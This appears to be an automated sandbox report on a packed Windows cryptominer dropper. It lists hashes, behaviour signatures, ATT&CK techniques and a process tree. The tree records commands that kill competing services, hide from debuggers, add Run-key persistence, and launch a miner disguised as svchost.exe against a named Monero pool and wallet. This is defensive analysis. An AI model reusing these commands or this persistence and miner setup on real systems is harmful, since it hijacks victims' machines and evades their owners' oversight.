Analysis

  • max time kernel
    140s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2022 12:54

General

  • Target

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe

  • Size

    4.4MB

  • MD5

    bebf99d452c84ae6942edb67981dfe7b

  • SHA1

    706ccf3e9fd16462d26b7feb3aaaa9075d416765

  • SHA256

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83

  • SHA512

    60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da

  • SSDEEP

    98304:oP8ReGIO335AWrRNoZgo7gnqlNMIHf9k0LNm4ykaJQmJGChdT+r:6MeG335AWVNug6gn6NVm0xEXJQmJhd

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 12 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe
    "C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1896
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1696
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1176
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im WerFault.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:972
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1652
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" stop "Windows Ssyncer"
      2⤵
      • Launches sc.exe
      PID:1460
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" stop "Windows ssyncer agent"
      2⤵
      • Launches sc.exe
      PID:944
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" delete "Windows Ssyncer"
      2⤵
      • Launches sc.exe
      PID:364
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" delete "Windows ssyncer agent"
      2⤵
      • Launches sc.exe
      PID:532
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im ssyncer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1688
    • C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe
      "C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe" C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe
      2⤵
      • Executes dropped EXE
      • Deletes itself
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1812
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2044
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im WerFault.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:588
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:580
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -a cryptonight -o stratum+tcp://xmr.farm:3333 -u 45VGQ59BKuqRnUWaGzw5r17xhgnzPteTXAXqfDLnPswLEjGS3xi9MxZb1MCV2sAyj9MZ3v1tohdLa34hZVvzmkn3EYJAaVE -p x -t 2
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:1816

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Impair Defenses

1
T1562

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Impact

Service Stop

1
T1489

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSVCR100.dll
    Filesize

    809KB

    MD5

    366fd6f3a451351b5df2d7c4ecf4c73a

    SHA1

    50db750522b9630757f91b53df377fd4ed4e2d66

    SHA256

    ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

    SHA512

    2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

  • C:\Users\Admin\AppData\Local\Temp\libcurl.dll
    Filesize

    355KB

    MD5

    0ed8d06706e2a9a8fc17ea5b775b3507

    SHA1

    752a72953fc2eacc1fe8d054f585169530bb826e

    SHA256

    6eedb93c55a2c541963b6e2df4dd92e7578833a4cf5d65501fa9d15530e3b1c3

    SHA512

    ac5c467993f71ce0cc7bbbcba48a91c0369bac9dac64d1fc34969ec82791ee9b2707359176c0563c70d080a57c308b784a15989196aec593741cced085af39a3

  • C:\Users\Admin\AppData\Local\Temp\pthreadVC2.dll
    Filesize

    81KB

    MD5

    4a502706d149c2f5854131a7758a90e2

    SHA1

    845842f909769a673138553748ad09e609ec3e17

    SHA256

    0e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e

    SHA512

    1cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    1.1MB

    MD5

    791f352c9aa2bbc0c711b595eea44c98

    SHA1

    3faa9e490977ce053609f2656b7a8bf75f8c6515

    SHA256

    b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd

    SHA512

    7258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    1.1MB

    MD5

    791f352c9aa2bbc0c711b595eea44c98

    SHA1

    3faa9e490977ce053609f2656b7a8bf75f8c6515

    SHA256

    b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd

    SHA512

    7258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3

  • C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe
    Filesize

    4.4MB

    MD5

    bebf99d452c84ae6942edb67981dfe7b

    SHA1

    706ccf3e9fd16462d26b7feb3aaaa9075d416765

    SHA256

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83

    SHA512

    60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da

  • C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe
    Filesize

    4.4MB

    MD5

    bebf99d452c84ae6942edb67981dfe7b

    SHA1

    706ccf3e9fd16462d26b7feb3aaaa9075d416765

    SHA256

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83

    SHA512

    60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da

  • \Users\Admin\AppData\Local\Temp\libcurl.dll
    Filesize

    355KB

    MD5

    0ed8d06706e2a9a8fc17ea5b775b3507

    SHA1

    752a72953fc2eacc1fe8d054f585169530bb826e

    SHA256

    6eedb93c55a2c541963b6e2df4dd92e7578833a4cf5d65501fa9d15530e3b1c3

    SHA512

    ac5c467993f71ce0cc7bbbcba48a91c0369bac9dac64d1fc34969ec82791ee9b2707359176c0563c70d080a57c308b784a15989196aec593741cced085af39a3

  • \Users\Admin\AppData\Local\Temp\msvcr100.dll
    Filesize

    809KB

    MD5

    366fd6f3a451351b5df2d7c4ecf4c73a

    SHA1

    50db750522b9630757f91b53df377fd4ed4e2d66

    SHA256

    ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

    SHA512

    2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

  • \Users\Admin\AppData\Local\Temp\pthreadVC2.dll
    Filesize

    81KB

    MD5

    4a502706d149c2f5854131a7758a90e2

    SHA1

    845842f909769a673138553748ad09e609ec3e17

    SHA256

    0e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e

    SHA512

    1cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161

  • \Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    1.1MB

    MD5

    791f352c9aa2bbc0c711b595eea44c98

    SHA1

    3faa9e490977ce053609f2656b7a8bf75f8c6515

    SHA256

    b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd

    SHA512

    7258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3

  • \Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    1.1MB

    MD5

    791f352c9aa2bbc0c711b595eea44c98

    SHA1

    3faa9e490977ce053609f2656b7a8bf75f8c6515

    SHA256

    b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd

    SHA512

    7258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3

  • \Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe
    Filesize

    4.4MB

    MD5

    bebf99d452c84ae6942edb67981dfe7b

    SHA1

    706ccf3e9fd16462d26b7feb3aaaa9075d416765

    SHA256

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83

    SHA512

    60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da

  • \Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe
    Filesize

    4.4MB

    MD5

    bebf99d452c84ae6942edb67981dfe7b

    SHA1

    706ccf3e9fd16462d26b7feb3aaaa9075d416765

    SHA256

    de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83

    SHA512

    60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da

  • memory/364-63-0x0000000000000000-mapping.dmp
  • memory/532-64-0x0000000000000000-mapping.dmp
  • memory/580-80-0x0000000000000000-mapping.dmp
  • memory/588-79-0x0000000000000000-mapping.dmp
  • memory/944-62-0x0000000000000000-mapping.dmp
  • memory/972-59-0x0000000000000000-mapping.dmp
  • memory/1176-58-0x0000000000000000-mapping.dmp
  • memory/1324-77-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/1324-72-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/1324-68-0x0000000000000000-mapping.dmp
  • memory/1324-98-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/1324-84-0x0000000005720000-0x0000000005960000-memory.dmp
    Filesize

    2.2MB

  • memory/1460-61-0x0000000000000000-mapping.dmp
  • memory/1652-60-0x0000000000000000-mapping.dmp
  • memory/1688-65-0x0000000000000000-mapping.dmp
  • memory/1696-57-0x0000000000000000-mapping.dmp
  • memory/1812-76-0x0000000000000000-mapping.dmp
  • memory/1816-93-0x0000000180000000-0x00000001800C7000-memory.dmp
    Filesize

    796KB

  • memory/1816-102-0x0000000180000000-0x00000001800C7000-memory.dmp
    Filesize

    796KB

  • memory/1816-86-0x000000013F160000-0x000000013F3A0000-memory.dmp
    Filesize

    2.2MB

  • memory/1816-82-0x0000000000000000-mapping.dmp
  • memory/1816-101-0x000000013F160000-0x000000013F3A0000-memory.dmp
    Filesize

    2.2MB

  • memory/1816-99-0x0000000180000000-0x00000001800C7000-memory.dmp
    Filesize

    796KB

  • memory/1816-96-0x000000013F160000-0x000000013F3A0000-memory.dmp
    Filesize

    2.2MB

  • memory/1896-75-0x0000000005A20000-0x00000000063D5000-memory.dmp
    Filesize

    9.7MB

  • memory/1896-56-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/1896-54-0x0000000075201000-0x0000000075203000-memory.dmp
    Filesize

    8KB

  • memory/1896-55-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/1896-73-0x0000000005A20000-0x00000000063D5000-memory.dmp
    Filesize

    9.7MB

  • memory/1896-100-0x0000000005A20000-0x00000000063D5000-memory.dmp
    Filesize

    9.7MB

  • memory/1896-74-0x0000000000400000-0x0000000000DB5000-memory.dmp
    Filesize

    9.7MB

  • memory/2044-78-0x0000000000000000-mapping.dmp